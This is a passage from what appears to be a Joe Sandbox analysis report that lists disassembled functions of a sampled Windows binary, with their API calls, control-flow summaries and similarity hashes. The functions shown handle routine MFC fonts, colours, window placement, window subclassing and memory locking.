                                                                              Function 00E8827B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,?,?,00E96518,00000000,01047AD0,00000010,00E95C16,?,?,?,00E958B7,00000000), ref: 00E8828F
                                                                              • GetLastError.KERNEL32(?,?,?,00E96518,00000000,01047AD0,00000010,00E95C16,?,?,?,00E958B7,00000000), ref: 00E882C6
                                                                              Strings
                                                                              • IsolationAware function called after IsolationAwareCleanup, xrefs: 00E8828A
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: DebugErrorLastOutputString
                                                                              • String ID: IsolationAware function called after IsolationAwareCleanup
                                                                              • API String ID: 4132100945-2690750368
                                                                              • Opcode ID: a47d3ded39f609d16a9864f45029e101aa65f0301d50ac4bc1989f4e3a4b41a3
                                                                              • Instruction ID: fc12f06f4e90e17a2eeb586f1fe5be93f0fe041f7515874b19d0b2cf023bead2
                                                                              • Opcode Fuzzy Hash: a47d3ded39f609d16a9864f45029e101aa65f0301d50ac4bc1989f4e3a4b41a3
                                                                              • Instruction Fuzzy Hash: A8F0C830200E618F4B353765AF4452B3695AA1674C7D02227FD4DFA125DF25DC4087A9
                                                                              Function 00E97968 Relevance: 70.4, APIs: 35, Strings: 5, Instructions: 373stringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 e97968-e979c5 call fcba7e call e99951 GetDeviceCaps 5 e979e0 0->5 6 e979c7-e979d6 0->6 8 e979e2 5->8 7 e979d8-e979de 6->7 6->8 9 e979e4-e979ec 7->9 8->9 10 e979ee-e979f2 9->10 11 e97a02-e97a0a 9->11 10->11 14 e979f4-e979fc call e9a37b DeleteObject 10->14 12 e97a0c-e97a10 11->12 13 e97a20-e97a28 11->13 12->13 15 e97a12-e97a1a call e9a37b DeleteObject 12->15 16 e97a2a-e97a2e 13->16 17 e97a3e-e97a46 13->17 14->11 15->13 16->17 21 e97a30-e97a38 call e9a37b DeleteObject 16->21 22 e97a48-e97a4c 17->22 23 e97a5c-e97a64 17->23 21->17 22->23 28 e97a4e-e97a56 call e9a37b DeleteObject 22->28 24 e97a7a-e97a82 23->24 25 e97a66-e97a6a 23->25 30 e97a98-e97aa0 24->30 31 e97a84-e97a88 24->31 25->24 29 e97a6c-e97a74 call e9a37b DeleteObject 25->29 28->23 29->24 36 e97aa2-e97aa6 30->36 37 e97ab6-e97abe 30->37 31->30 35 e97a8a-e97a92 call e9a37b DeleteObject 31->35 35->30 36->37 43 e97aa8-e97ab0 call e9a37b DeleteObject 36->43 39 e97ac0-e97ac4 37->39 40 e97ad4-e97adc 37->40 39->40 44 e97ac6-e97ace call e9a37b DeleteObject 39->44 45 e97ade-e97ae2 40->45 46 e97af2-e97afa 40->46 43->37 44->40 45->46 50 e97ae4-e97aec call e9a37b DeleteObject 45->50 51 e97afc-e97b00 46->51 52 e97b10-e97b6b call e97351 call fcea50 GetTextCharsetInfo 46->52 50->46 51->52 56 e97b02-e97b0a call e9a37b DeleteObject 51->56 64 e97b6d-e97b70 52->64 65 e97b72-e97b76 52->65 56->52 66 e97b79-e97b80 64->66 65->66 67 e97b78 65->67 68 e97b82 66->68 69 e97b84-e97b9c lstrcpyA 66->69 67->66 68->69 70 e97c0a-e97c54 CreateFontIndirectA call e9a197 call fd686a call fcbc50 69->70 71 e97b9e-e97ba5 69->71 84 e97c5b-e97d61 CreateFontIndirectA call e9a197 call e97351 CreateFontIndirectA call e9a197 CreateFontIndirectA call e9a197 CreateFontIndirectA call e9a197 GetSystemMetrics lstrcpyA CreateFontIndirectA call e9a197 GetStockObject 70->84 85 e97c56-e97c58 70->85 71->70 73 e97ba7-e97bc1 EnumFontFamiliesA 71->73 75 e97bd8-e97bf5 EnumFontFamiliesA 73->75 76 e97bc3-e97bd6 lstrcpyA 73->76 78 e97bfe 75->78 79 e97bf7-e97bfc 75->79 76->70 81 e97c03-e97c04 lstrcpyA 78->81 79->81 81->70 98 e97ddc-e97e41 GetStockObject call e9a480 GetObjectA CreateFontIndirectA call e9a197 CreateFontIndirectA call e9a197 call e982be 84->98 99 e97d63-e97d72 GetObjectA 84->99 85->84 112 e97e72-e97e74 98->112 99->98 100 e97d74-e97dd7 lstrcpyA CreateFontIndirectA call e9a197 CreateFontIndirectA call e9a197 99->100 100->98 113 e97e43-e97e47 112->113 114 e97e76-e97e86 call e823e0 112->114 115 e97e49-e97e50 113->115 116 e97e9c-e97ea1 call e990da 113->116 120 e97e8b-e97e9b call e99a90 call fcba28 114->120 115->116 118 e97e52-e97e5c call ea0254 115->118 118->112 127 e97e5e-e97e6e 118->127 127->112
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E97972
                                                                                • Part of subcall function 00E99951: __EH_prolog3.LIBCMT ref: 00E99958
                                                                                • Part of subcall function 00E99951: GetWindowDC.USER32(00000000,00000004,00E97F08,00000000), ref: 00E99984
                                                                              • GetDeviceCaps.GDI32(?,00000058), ref: 00E97992
                                                                              • DeleteObject.GDI32(00000000), ref: 00E979FC
                                                                              • DeleteObject.GDI32(00000000), ref: 00E97A1A
                                                                              • DeleteObject.GDI32(00000000), ref: 00E97A38
                                                                              • DeleteObject.GDI32(00000000), ref: 00E97A56
                                                                              • DeleteObject.GDI32(00000000), ref: 00E97A74
                                                                              • DeleteObject.GDI32(00000000), ref: 00E97A92
                                                                              • DeleteObject.GDI32(00000000), ref: 00E97AB0
                                                                              • DeleteObject.GDI32(00000000), ref: 00E97ACE
                                                                              • DeleteObject.GDI32(00000000), ref: 00E97AEC
                                                                              • DeleteObject.GDI32(00000000), ref: 00E97B0A
                                                                              • GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 00E97B42
                                                                              • lstrcpyA.KERNEL32(?,?), ref: 00E97B92
                                                                              • EnumFontFamiliesA.GDI32(?,00000000,00E971DD,Segoe UI), ref: 00E97BB9
                                                                              • lstrcpyA.KERNEL32(?,Segoe UI), ref: 00E97BCC
                                                                              • EnumFontFamiliesA.GDI32(?,00000000,00E971DD,Tahoma), ref: 00E97BEA
                                                                              • lstrcpyA.KERNEL32(?,MS Sans Serif), ref: 00E97C04
                                                                              • CreateFontIndirectA.GDI32(?), ref: 00E97C0E
                                                                              • CreateFontIndirectA.GDI32(?), ref: 00E97C5F
                                                                              • CreateFontIndirectA.GDI32(?), ref: 00E97C9E
                                                                              • CreateFontIndirectA.GDI32(?), ref: 00E97CCA
                                                                              • CreateFontIndirectA.GDI32(?), ref: 00E97CEB
                                                                              • GetSystemMetrics.USER32(00000048), ref: 00E97D0A
                                                                              • lstrcpyA.KERNEL32(?,Marlett), ref: 00E97D1D
                                                                              • CreateFontIndirectA.GDI32(?), ref: 00E97D27
                                                                              • GetStockObject.GDI32(00000011), ref: 00E97D53
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 00E97D6A
                                                                              • lstrcpyA.KERNEL32(?,Arial,?,?,00000000), ref: 00E97DA7
                                                                              • CreateFontIndirectA.GDI32(?), ref: 00E97DB1
                                                                              • CreateFontIndirectA.GDI32(?), ref: 00E97DCA
                                                                              • GetStockObject.GDI32(00000011), ref: 00E97DDE
                                                                              • GetObjectA.GDI32(?,0000003C,?), ref: 00E97DF3
                                                                              • CreateFontIndirectA.GDI32(?), ref: 00E97E01
                                                                              • CreateFontIndirectA.GDI32(?), ref: 00E97E22
                                                                                • Part of subcall function 00E982BE: __EH_prolog3_GS.LIBCMT ref: 00E982C5
                                                                                • Part of subcall function 00E982BE: GetTextMetricsA.GDI32(?,00FF0000), ref: 00E982FA
                                                                                • Part of subcall function 00E982BE: GetTextMetricsA.GDI32(?,00FF0000), ref: 00E9833B
                                                                                • Part of subcall function 00E990DA: __CxxThrowException@8.LIBVCRUNTIME ref: 00E990EE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Font$CreateDeleteIndirect$lstrcpy$MetricsText$EnumFamiliesH_prolog3_Stock$CapsCharsetDeviceException@8H_prolog3InfoSystemThrowWindow
                                                                              • String ID: Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
                                                                              • API String ID: 3209990573-1395034203
                                                                              • Opcode ID: 7eded6c0681c14a6f7581cc5995e6c02bfbb16c0c0b101495aaae107015caca5
                                                                              • Instruction ID: 77018c80c5aeab3a91edc654a1190850cd7cc00b3d9af5972898ca702b014738
                                                                              • Opcode Fuzzy Hash: 7eded6c0681c14a6f7581cc5995e6c02bfbb16c0c0b101495aaae107015caca5
                                                                              • Instruction Fuzzy Hash: 23E19070905209DFDF22DFA0D859BEEBBB8BF04304F045469F586B6281DB789A48CF51
                                                                              Function 00E97EA2 Relevance: 64.8, APIs: 43, Instructions: 295COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • __EH_prolog3.LIBCMT ref: 00E97EA9
                                                                              • GetSysColor.USER32(00000016), ref: 00E97EB2
                                                                              • GetSysColor.USER32(0000000F), ref: 00E97EC5
                                                                              • GetSysColor.USER32(00000015), ref: 00E97EDC
                                                                              • GetSysColor.USER32(0000000F), ref: 00E97EE8
                                                                              • GetDeviceCaps.GDI32(?,0000000C), ref: 00E97F10
                                                                              • GetSysColor.USER32(0000000F), ref: 00E97F1E
                                                                              • GetSysColor.USER32(00000010), ref: 00E97F2C
                                                                              • GetSysColor.USER32(00000015), ref: 00E97F3A
                                                                              • GetSysColor.USER32(00000016), ref: 00E97F48
                                                                              • GetSysColor.USER32(00000014), ref: 00E97F56
                                                                              • GetSysColor.USER32(00000012), ref: 00E97F64
                                                                              • GetSysColor.USER32(00000011), ref: 00E97F72
                                                                              • GetSysColor.USER32(00000006), ref: 00E97F7D
                                                                              • GetSysColor.USER32(0000000D), ref: 00E97F88
                                                                              • GetSysColor.USER32(0000000E), ref: 00E97F93
                                                                              • GetSysColor.USER32(00000005), ref: 00E97F9E
                                                                              • GetSysColor.USER32(00000008), ref: 00E97FAC
                                                                              • GetSysColor.USER32(00000009), ref: 00E97FB7
                                                                              • GetSysColor.USER32(00000007), ref: 00E97FC2
                                                                              • GetSysColor.USER32(00000002), ref: 00E97FCD
                                                                              • GetSysColor.USER32(00000003), ref: 00E97FD8
                                                                              • GetSysColor.USER32(0000001B), ref: 00E97FE6
                                                                              • GetSysColor.USER32(0000001C), ref: 00E97FF4
                                                                              • GetSysColor.USER32(0000000A), ref: 00E98002
                                                                              • GetSysColor.USER32(0000000B), ref: 00E98010
                                                                              • GetSysColor.USER32(00000013), ref: 00E9801E
                                                                              • GetSysColor.USER32(0000001A), ref: 00E9803F
                                                                              • GetSysColorBrush.USER32(00000010), ref: 00E98058
                                                                              • GetSysColorBrush.USER32(00000014), ref: 00E9806B
                                                                              • GetSysColorBrush.USER32(00000005), ref: 00E9807E
                                                                              • CreateSolidBrush.GDI32(?), ref: 00E9809F
                                                                              • CreateSolidBrush.GDI32(?), ref: 00E980BD
                                                                              • CreateSolidBrush.GDI32(?), ref: 00E980DB
                                                                              • CreateSolidBrush.GDI32(?), ref: 00E980FC
                                                                              • CreateSolidBrush.GDI32(?), ref: 00E9811A
                                                                              • CreateSolidBrush.GDI32(?), ref: 00E98138
                                                                              • CreateSolidBrush.GDI32(?), ref: 00E98156
                                                                              • CreatePen.GDI32(00000000,00000001,00000000), ref: 00E9817A
                                                                              • CreatePen.GDI32(00000000,00000001,00000000), ref: 00E9819E
                                                                              • CreatePen.GDI32(00000000,00000001,00000000), ref: 00E981C2
                                                                              • CreateSolidBrush.GDI32(?), ref: 00E98240
                                                                              • CreatePatternBrush.GDI32(00000000), ref: 00E9827E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Color$BrushCreate$Solid$CapsDeviceH_prolog3Pattern
                                                                              • String ID:
                                                                              • API String ID: 3832706086-0
                                                                              • Opcode ID: efc14b4d3ced01e6415a15eb0a98f908f54cd6f057c54638ce5a5cb76a310ae9
                                                                              • Instruction ID: bd061709a6bf14152df770f0d52b5508bf924e2b3925c0b272bbe8bb40132fd7
                                                                              • Opcode Fuzzy Hash: efc14b4d3ced01e6415a15eb0a98f908f54cd6f057c54638ce5a5cb76a310ae9
                                                                              • Instruction Fuzzy Hash: D8C186B0600B16AFDB27AF71D9097ADBFB0BF08701F041129F689EB585CB7A9510DB91
                                                                              Function 00E9F8B6 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 186windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 215 e9f8b6-e9f8da call ea562b 218 e9f8dc-e9f8e5 215->218 219 e9f8e7-e9f8ed 215->219 220 e9f925-e9f95e GetWindowRect 218->220 221 e9f8fa-e9f8ff GetWindow 219->221 222 e9f8ef-e9f8f8 GetParent 219->222 224 e9f9ed-e9fa16 GetParent GetClientRect * 2 MapWindowPoints 220->224 225 e9f964-e9f966 220->225 223 e9f905-e9f90b 221->223 222->223 223->220 227 e9f90d-e9f921 SendMessageA 223->227 226 e9fa1c-e9fa5e 224->226 228 e9f968-e9f981 GetWindowLongA 225->228 229 e9f983-e9f98c 225->229 230 e9fa69-e9fa6c 226->230 231 e9fa60-e9fa66 226->231 227->220 232 e9f923 227->232 228->229 233 e9f9be-e9f9d7 GetWindowRect MonitorFromWindow GetMonitorInfoA 229->233 234 e9f98e-e9f995 call e867a6 229->234 236 e9fa6e 230->236 237 e9fa71-e9fa79 230->237 231->230 232->220 235 e9f9dd-e9f9eb CopyRect 233->235 244 e9f99a-e9f9bc MonitorFromWindow GetMonitorInfoA CopyRect 234->244 245 e9f997 234->245 235->226 236->237 239 e9fa7b-e9fa81 237->239 240 e9fa84-e9fa87 237->240 239->240 242 e9fa89 240->242 243 e9fa8c-e9fa99 call ea5bad 240->243 242->243 247 e9fa9e-e9faac call fcb27c 243->247 244->235 245->244
                                                                              APIs
                                                                                • Part of subcall function 00EA562B: GetWindowLongA.USER32(00000000,000000F0), ref: 00EA5638
                                                                              • GetParent.USER32(00EA3AD7), ref: 00E9F8F2
                                                                              • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 00E9F917
                                                                              • GetWindowRect.USER32(00EA3AD7,00000000), ref: 00E9F93C
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00E9F96B
                                                                              • MonitorFromWindow.USER32(00000000,00000001), ref: 00E9F9A1
                                                                              • GetMonitorInfoA.USER32(00000000), ref: 00E9F9A8
                                                                              • CopyRect.USER32(?,?), ref: 00E9F9B6
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00E9F9C3
                                                                              • MonitorFromWindow.USER32(00000000,00000002), ref: 00E9F9D0
                                                                              • GetMonitorInfoA.USER32(00000000), ref: 00E9F9D7
                                                                              • CopyRect.USER32(?,?), ref: 00E9F9E5
                                                                              • GetParent.USER32(00EA3AD7), ref: 00E9F9F0
                                                                              • GetClientRect.USER32(00000000,?), ref: 00E9F9FD
                                                                              • GetClientRect.USER32(00000000,?), ref: 00E9FA08
                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00E9FA16
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$Monitor$ClientCopyFromInfoLongParent$MessagePointsSend
                                                                              • String ID: (
                                                                              • API String ID: 3610148278-3887548279
                                                                              • Opcode ID: a6057f3ed5ebdb9ab2edbaac9dd8b47e98a9a922c0b02a95135a8f9aeb9382ca
                                                                              • Instruction ID: 4f99565e9302fa3df9f19fea9891463bb1ff40259f7ad06e797b54c07d400fc0
                                                                              • Opcode Fuzzy Hash: a6057f3ed5ebdb9ab2edbaac9dd8b47e98a9a922c0b02a95135a8f9aeb9382ca
                                                                              • Instruction Fuzzy Hash: 52614CB290020AAFCF12DFA8DD89BEEBBB9FF48315F155125E505FB244D735A9018B60
                                                                              Function 00EA378F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 66COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 250 ea378f-ea379b 251 ea37cb-ea37d7 GetClassLongA 250->251 252 ea379d-ea37b2 GetClassNameA 250->252 255 ea37de 251->255 253 ea37e0-ea37ed GetWindowLongA 252->253 254 ea37b4-ea37c9 call fd6b6e 252->254 257 ea3835-ea3850 CallNextHookEx 253->257 258 ea37ef-ea37fd GetPropA 253->258 254->255 255->253 255->257 261 ea385f-ea3866 call fcba28 257->261 262 ea3852-ea385b UnhookWindowsHookEx 257->262 258->257 260 ea37ff-ea381a SetPropA GetPropA 258->260 260->257 264 ea381c-ea382f GlobalAddAtomA SetWindowLongA 260->264 262->261 264->257
                                                                              APIs
                                                                              • GetClassNameA.USER32(?,?,00000100), ref: 00EA37AA
                                                                              • GetClassLongA.USER32(?,000000E0), ref: 00EA37CE
                                                                              • GetWindowLongA.USER32(?,000000FC), ref: 00EA37E3
                                                                              • GetPropA.USER32(?,AfxOldWndProc423), ref: 00EA37F5
                                                                              • SetPropA.USER32(?,AfxOldWndProc423,00000000), ref: 00EA3806
                                                                              • GetPropA.USER32(?,AfxOldWndProc423), ref: 00EA3812
                                                                              • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 00EA3821
                                                                              • SetWindowLongA.USER32(?,000000FC,Function_00023483), ref: 00EA382F
                                                                              • CallNextHookEx.USER32(?,00000003,?,?), ref: 00EA3841
                                                                              • UnhookWindowsHookEx.USER32(?), ref: 00EA3855
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: LongProp$ClassHookWindow$AtomCallGlobalNameNextUnhookWindows
                                                                              • String ID: AfxOldWndProc423
                                                                              • API String ID: 3422115740-1060338832
                                                                              • Opcode ID: 23d196cd6e89d8a51a27321452809a280270522043a5a918bcc2845754597c34
                                                                              • Instruction ID: 8911f6c329a1fed17a5d82f33bef2dc3e0e91fd067c1ab3b1a5b4eacaa775c46
                                                                              • Opcode Fuzzy Hash: 23d196cd6e89d8a51a27321452809a280270522043a5a918bcc2845754597c34
                                                                              • Instruction Fuzzy Hash: E611CD71100211AFDB232B219C8DFBF7A68BF0AB65F101249F481ED1D5DB2A8A41DB61
                                                                              Function 00EA3483 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 101COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 00EA348A
                                                                              • GetPropA.USER32(?,AfxOldWndProc423), ref: 00EA34A1
                                                                              • CallWindowProcA.USER32(?,?,00000110,?,?), ref: 00EA3505
                                                                                • Part of subcall function 00EA3A3C: GetWindowRect.USER32(?,?), ref: 00EA3A7D
                                                                                • Part of subcall function 00EA3A3C: GetWindow.USER32(00000004,00000004), ref: 00EA3A9A
                                                                              • SetWindowLongA.USER32(?,000000FC,00000000), ref: 00EA3525
                                                                              • RemovePropA.USER32(?,AfxOldWndProc423), ref: 00EA3532
                                                                              • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 00EA3539
                                                                              • GlobalDeleteAtom.KERNEL32(?), ref: 00EA3543
                                                                                • Part of subcall function 00EA3AE7: GetWindowRect.USER32(?,?), ref: 00EA3AF4
                                                                              • CallWindowProcA.USER32(?,?,?,?,?), ref: 00EA359A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catch_LongRemove
                                                                              • String ID: AfxOldWndProc423
                                                                              • API String ID: 3351853316-1060338832
                                                                              • Opcode ID: a4e042ac915eb150aa3f98c55fa4d501503b91ea01ed47ec0d137c50a7da7032
                                                                              • Instruction ID: 43b2545c839bc31e684bc93981d6ff03bef39a40b4b3cd2dba44fc759b58c896
                                                                              • Opcode Fuzzy Hash: a4e042ac915eb150aa3f98c55fa4d501503b91ea01ed47ec0d137c50a7da7032
                                                                              • Instruction Fuzzy Hash: 54317071D00218AFCF16AFB9DC598BFBAB8FF4E310F10511AF542BA151D739AA009B60
                                                                              Function 00EA6748 Relevance: 15.1, APIs: 10, Instructions: 111memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 299 ea6748-ea676e EnterCriticalSection 300 ea677c-ea6781 299->300 301 ea6770-ea6776 299->301 303 ea679d-ea67a9 300->303 304 ea6783-ea6785 300->304 301->300 302 ea6822-ea6828 301->302 305 ea682a 302->305 306 ea682d-ea6846 LeaveCriticalSection 302->306 308 ea67ab-ea67be call e9943a GlobalAlloc 303->308 309 ea67c0-ea67e5 GlobalHandle GlobalUnlock call e9943a GlobalReAlloc 303->309 307 ea6788-ea678b 304->307 305->306 310 ea678d-ea6793 307->310 311 ea6795-ea6797 307->311 316 ea67eb-ea67ed 308->316 309->316 310->307 310->311 311->302 311->303 317 ea67ef-ea681f GlobalLock call fcea50 316->317 318 ea6847-ea684a 316->318 317->302 319 ea685b-ea686a LeaveCriticalSection call e990f4 318->319 320 ea684c-ea6855 GlobalHandle GlobalLock 318->320 320->319
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00EA675D
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00EA67B8
                                                                              • GlobalHandle.KERNEL32(?), ref: 00EA67C2
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00EA67CB
                                                                              • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 00EA67E5
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00EA67F0
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00EA683A
                                                                              • GlobalHandle.KERNEL32(?), ref: 00EA684E
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00EA6855
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00EA685F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                              • String ID:
                                                                              • API String ID: 2667261700-0
                                                                              • Opcode ID: 1986b27fd8149e0f62a8e7d8295d5c3cdd2f8b222e083e19466f18e4a23f1a8b
                                                                              • Instruction ID: 30a287200a1f6606f0956f2027af50e6bc90aa6c13da2d664ac093572560f267
